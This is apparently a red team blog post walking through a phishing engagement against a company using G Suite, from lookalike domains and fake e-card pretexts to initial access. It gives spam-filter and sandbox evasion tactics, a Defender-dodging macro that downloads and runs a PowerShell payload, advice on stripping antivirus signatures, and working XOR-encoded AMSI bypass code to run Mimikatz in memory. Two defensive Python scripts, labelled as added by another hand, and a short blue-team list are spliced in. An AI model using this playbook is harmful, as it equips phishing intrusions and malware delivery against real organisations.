Red Team Techniques - Gaining Access Through Phishing

Category: Programming Tools · Published: 5 years ago


There are many posts about how red teams build phishing campaigns, but most of them are far from complete.

Below I walk through one of our recent engagements from zero to access: creating the domain, crafting the phishing pretext, getting past spam filters, caveats about email gateways, generating a payload that evades detection, and bypassing AMSI. A list of reference articles is at the end.

## Important considerations

  • Where the mail originates
    • Sending mail from a local script
    • How trustworthy the IPs in the headers look
  • Whether a recently purchased VPS has any sender history
  • Reputation of the links and age of the domain
  • Use a high-reputation sender such as Mailchimp or SendGrid
    • Verify your own domain with these providers so the mail reads "From: your domain" rather than "via Mailchimp for XXX"
  • Match the target's email Return-Path
  • Configure SPF (Sender Policy Framework), DKIM (DomainKeys Identified Mail) and DMARC (an extensible email authentication protocol built on SPF and DKIM that establishes a feedback loop between sender and receiver, so both sides can jointly refine and monitor how the domain is managed)
  • Timing and sending rate
    • Sending 100 emails at once from a very low-reputation IP will almost certainly be flagged as spam
  • SSL certificates on the sending domain and on the links
  • Broken links (https://www.computerhope.com/jargon/b/broken_link.htm)
  • The amount of HTML content
  • Stay off blacklists
    • How long the engagement runs determines how much attention this deserves

  • Protection against automated scanning engines. This matters if the site you cloned has a high reputation
    • Scrapers and SEGs (Secure Email Gateways) can spot phishing pages imitating Office 365, Gmail and the like
    • Serve benign content to automated platforms to avoid detection
    • You can get a list of web crawlers using the WEB_CRAWLER tag of the public GreyNoise API
      • `-s -XPOST -d 'tag`
    • You can also use techniques to fingerprint headless Chrome, Selenium and similar environments
  • Host the payload on a high-reputation domain
    • SEGs are getting better at recognizing malicious payloads; once one is detected, the domain may be blacklisted
    • Once detected, a second attempt has little chance of success and the campaign is most likely over
    • See this post, https://posts.specterops.io/being-a-good-domain-shepherd-part-2-5e8597c3fe63, to check whether your domain is in the state it describes
  • 301/302 redirects to a high-reputation domain
    • Your domain may still be classified as malicious, since you have no real relationship with the domain you redirect to
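The SPF/DKIM/DMARC item above is exactly what a receiving gateway scores, and the same records are what a defender should audit on their own domains. As an added example that is not part of the original post, the Python below parses constructed SPF and DMARC TXT strings (no real domain is queried) and flags the weak settings that leave a domain easy to spoof; note that a lookalike domain with valid records still passes, so these checks complement sender-domain scrutiny rather than replace it.

```python
"""Audit SPF and DMARC TXT records for weak settings (added example, constructed data)."""
from typing import Dict, List, Optional

# Constructed sample TXT records, keyed by the name `dig TXT` would be asked for.
SAMPLE_TXT: Dict[str, List[str]] = {
    "weak.example": ["v=spf1 include:mail.example ~all"],          # softfail only
    "_dmarc.weak.example": ["v=DMARC1; p=none; pct=50"],          # monitor only, partial
    "strict.example": ["v=spf1 include:_spf.google.com -all"],
    "_dmarc.strict.example": [
        "v=DMARC1; p=reject; rua=mailto:dmarc@strict.example; adkim=s; aspf=s"
    ],
    "open.example": ["v=spf1 +all"],                              # anyone may send
}


def parse_spf(record: str) -> Dict[str, object]:
    """Split an SPF record into mechanisms and extract the qualifier on 'all'."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        raise ValueError("not an SPF record")
    mechanisms = terms[1:]
    all_qualifier: Optional[str] = None
    for term in mechanisms:
        if term.lstrip("+-~?").lower() == "all":
            # A bare 'all' means '+all' (pass) per RFC 7208.
            all_qualifier = term[0] if term[0] in "+-~?" else "+"
    return {"mechanisms": mechanisms, "all": all_qualifier}


def parse_dmarc(record: str) -> Dict[str, str]:
    """Parse the 'tag=value;' pairs of a DMARC record into a dict."""
    tags: Dict[str, str] = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.strip().split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1":
        raise ValueError("not a DMARC record")
    return tags


def audit_domain(domain: str, txt: Dict[str, List[str]] = SAMPLE_TXT) -> List[str]:
    """Return human-readable findings about the domain's SPF and DMARC posture."""
    findings: List[str] = []
    spf_records = [r for r in txt.get(domain, []) if r.lower().startswith("v=spf1")]
    if not spf_records:
        findings.append("SPF: no record")
    elif len(spf_records) > 1:
        findings.append("SPF: multiple records (permerror)")
    else:
        spf = parse_spf(spf_records[0])
        if spf["all"] in (None, "+", "?"):
            findings.append("SPF: 'all' is permissive (%s)" % (spf["all"] or "missing"))
        elif spf["all"] == "~":
            findings.append("SPF: softfail only")
    dmarc_records = [r for r in txt.get("_dmarc." + domain, []) if r.startswith("v=DMARC1")]
    if not dmarc_records:
        findings.append("DMARC: no record")
    else:
        dmarc = parse_dmarc(dmarc_records[0])
        if dmarc.get("p", "none") == "none":
            findings.append("DMARC: p=none (monitor only)")
        if int(dmarc.get("pct", "100")) < 100:
            findings.append("DMARC: pct=%s (partial enforcement)" % dmarc["pct"])
        if "rua" not in dmarc:
            findings.append("DMARC: no rua= aggregate reporting")
    return findings


if __name__ == "__main__":
    for name in ("strict.example", "weak.example", "open.example"):
        print(name, audit_domain(name) or ["ok"])
```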
      
## Operations

Phishing campaigns are generally run in one of three ways:

  1. A targeted campaign against a single individual
  2. Collecting user information during reconnaissance, then mass mailing. Some recommended resources: https://github.com/laramies/theHarvester, https://github.com/DataSploit/datasploit, https://github.com/jivoi/awesome-osint, https://medium.com/@micallst/osint-resources-for-2019-b15d55187c3f
  3. Submitting forms on the target's own website, usually posing as a fake company

Use a different domain for each campaign so they cannot interfere with each other and damage reputation. Campaigns should scale from small to large: once a company realizes it is being targeted, your later activity will face ever stricter scrutiny. After verifying the domain and setting up email authentication we often deliver through Mailchimp; we have also had success with our own scripts using a G Suite account and SMTP authentication.

Because of time constraints (20 hours) we went with options 2 and 3, and both campaigns used malicious Word documents with macros.

## Reconnaissance

An MX lookup showed that the target company uses G Suite.

```
dig evilwing.me MX
```

![](https://raw.githubusercontent.com/evilwing/wing-images/master/img/20190221203000.png)

This example uses my own domain.

Google does a good job of filtering malicious attachments, so in this pair of campaigns the first placed the malicious file on a high-reputation domain and the second placed it on our own domain.

## Attack preparation: generating the Word document and payload

Use [unicorn](https://github.com/trustedsec/unicorn) to generate a malicious PowerShell macro that downloads and executes the payload.
Tweak it slightly to get past Defender:

```
"po" & "w" & "er" & "s" & "he" & "l" & "l" & ".e" & "x" & "e" & " "
```

We used [hershell](https://github.com/lesnuages/hershell) as the payload, a lightweight stager written in Go; the x86 build was undetected at the time. Once the payload is generated, the next step is obfuscation and encryption; if you know the target environment, you can also strip AV signatures by hand with tools such as dsplit. Some resources:

https://resources.infosecinstitute.com/antivirus-evasion-tools/

https://github.com/PowerShellMafia/PowerSploit/blob/master/AntivirusBypass/Find-AVSignature.ps1

http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html

msf5 has also recently added two evasion modules.

## AMSI bypass

To run our PowerShell code we have to get past Microsoft's own Windows Defender (WD). WD exposes the Antimalware Scan Interface: before PowerShell executes content, it submits it to the scan engine for analysis. Fortunately, [CyberArk](https://www.cyberark.com/threat-research-blog/amsi-bypass-redux/) had already published research on evading this; since Microsoft now flags that code, it is XOR-encoded to get around the signature.

  1. Re-compile the AMSI bypass DLL
  2. Convert the binary to base64
     `$base64string = [Convert]::ToBase64String([IO.File]::ReadAllBytes("$pwd\bypass.dll"))`
  3. XOR encrypt
     `foreach($byte in [Text.Encoding]::UTF8.GetBytes($base64string)) { $encrypted += $byte -bxor 1 }`
  4. Print the encrypted buffer as a byte array
     `foreach($byte in $encrypted){ Write-Host -nonewline "$byte," }`

On target

  1. Split the encrypted buffer because of PowerShell line-length limits
  2. Concatenate the buffer
     `$xorencrypted = $a + $b + $c + $d + $e + $f + $g`
  3. Decrypt the buffer
     `foreach($byte in $xorencrypted){$decrypted += $byte -bxor 1 }`
  4. Get the buffer as base64
     `$base64string = [Text.Encoding]::UTF8.GetString($decrypted)`
  5. Load the DLL using reflection
     `function Bypass-AMCEE { if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMCEE").Type) { [Reflection.Assembly]::Load([Convert]::FromBase64String($base64string)) | Out-Null } [Bypass.AMCEE]::Subvert(); }`
  6. Call the bypass method
     `Bypass-AMCEE`

This lets us run payloads such as Mimikatz in memory.
AMSI bypass: https://gist.github.com/jkamdjou/fcba44227cda85eb8829ee43646c6c77
    


```
# $a .. $g hold the split, XOR-encoded byte arrays of the base64 DLL from the preparation steps
$xorencrypted = $a + $b + $c + $d + $e + $f + $g

$decrypted = @()

# Undo the XOR with key 1 byte by byte
foreach($byte in $xorencrypted){$decrypted += $byte -bxor 1 }

# The decoded bytes are the base64 text of the DLL
$base64string = [Text.Encoding]::UTF8.GetString($decrypted)

function Bypass-AMCEE { if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMCEE").Type) { [Reflection.Assembly]::Load([Convert]::FromBase64String($base64string)) | Out-Null } [Bypass.AMCEE]::Subvert(); }

Bypass-AMCEE
```

## Campaign 1: a fake company with a targeted form submission

We emailed the target to enquire about new business and built a company page on our domain with a line of business similar to theirs. After Dropbox and other file-hosting services failed for hosting the payload, we settled on mixmax.com, which also lets you track who clicked the file.
The email sent to a sales representative:

![](https://raw.githubusercontent.com/evilwing/wing-images/master/img/20190221205526.png)

The malicious Word document carrying the macro; macros are required for it to "load correctly":

![](https://raw.githubusercontent.com/evilwing/wing-images/master/img/20190221205546.png)

Once macros are enabled, our hershell implant is dropped.

## Campaign 2: mass mailing

Since our campaign ran over the New Year period we used that as the pretext, imitating an employee appreciation program, http://appreciatehub.com/. Our own site was http://appreciateservices.com/, and visitors were redirected to the real site, http://octanner.com./. Doing this for long may get your domain flagged as malicious; cloning the site is the better option. The e-card is highly personalized; here is a sample as seen by the recipient.

![](https://raw.githubusercontent.com/evilwing/wing-images/master/img/20190221210229.png)

We put the congratulatory video in a Word document, which needs macros to play.

![](https://raw.githubusercontent.com/evilwing/wing-images/master/img/20190221210312.png)

Configure an nginx rule:

```
location /receivedECard {
    alias /var/www/html/HappyNewYear2019.docm;
    add_header Content-Disposition 'attachment; filename="Happy New Year 2019.docm"';
}
```

Initial access obtained.


## How the blue team can defend

  • Disable macros
  • Don't accept mail from untrusted sources
  • Open attachments in a virtual machine
  • Security awareness training
  • Harden inbox rules
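Both campaigns relied on a macro-enabled .docm that the nginx rule above served from an extension-less path under a friendly Content-Disposition name, and the first blue-team item is to disable macros. As an added example that is not from the original post, the Python below builds a constructed minimal OOXML package in memory and classifies it by its actual zip contents (the VBA part and the macro-enabled content type) rather than by the filename a sender chose; the sample contains no real macro code.

```python
"""Classify Office attachments by their OOXML contents, not their filename (added example)."""
import io
import zipfile
from typing import Dict

# Content type OOXML assigns to the VBA project part.
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
# Main-part content types for a plain vs. a macro-enabled Word document.
DOCX_MAIN = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"
DOCM_MAIN = "application/vnd.ms-word.document.macroEnabled.main+xml"


def build_sample_docm(with_macro: bool) -> bytes:
    """Construct a minimal OOXML zip mimicking a .docm (with_macro=True) or a .docx."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        overrides = ['<Override PartName="/word/document.xml" ContentType="%s"/>'
                     % (DOCM_MAIN if with_macro else DOCX_MAIN)]
        if with_macro:
            overrides.append('<Override PartName="/word/vbaProject.bin" ContentType="%s"/>'
                             % VBA_CONTENT_TYPE)
            # Constructed placeholder bytes; a real file carries an OLE compound document here.
            z.writestr("word/vbaProject.bin", b"CONSTRUCTED-PLACEHOLDER-NOT-A-VBA-PROJECT")
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?>'
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                   + "".join(overrides) + "</Types>")
        z.writestr("word/document.xml", "<w:document/>")
    return buf.getvalue()


def inspect_office_file(data: bytes) -> Dict[str, bool]:
    """Report whether an OOXML blob carries a VBA project, judged from the zip itself."""
    result = {"is_ooxml": False, "has_vba_part": False, "macro_enabled_type": False}
    if not data.startswith(b"PK\x03\x04"):          # not even a zip container
        return result
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            names = set(z.namelist())
            if "[Content_Types].xml" not in names:  # a zip, but not an OOXML package
                return result
            types_xml = z.read("[Content_Types].xml").decode("utf-8", "replace")
    except zipfile.BadZipFile:
        return result
    result["is_ooxml"] = True
    result["has_vba_part"] = any(n.lower().endswith("vbaproject.bin") for n in names)
    result["macro_enabled_type"] = VBA_CONTENT_TYPE in types_xml or "macroEnabled" in types_xml
    return result


def attachment_verdict(declared_name: str, data: bytes) -> str:
    """Decide on a download using its content; the declared name is only used to spot mismatches."""
    info = inspect_office_file(data)
    if not info["is_ooxml"]:
        return "not-ooxml"
    has_macros = info["has_vba_part"] or info["macro_enabled_type"]
    ext = declared_name.rsplit(".", 1)[-1].lower() if "." in declared_name else ""
    if has_macros and ext in ("docx", "xlsx", "pptx"):
        return "block: macro content behind a non-macro extension"
    if has_macros:
        return "block: macro-enabled document"
    return "allow: no VBA project"


if __name__ == "__main__":
    # The Content-Disposition filename from the campaign, applied to a constructed sample.
    print(attachment_verdict("Happy New Year 2019.docm", build_sample_docm(True)))
    print(attachment_verdict("newsletter.docx", build_sample_docm(False)))
```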
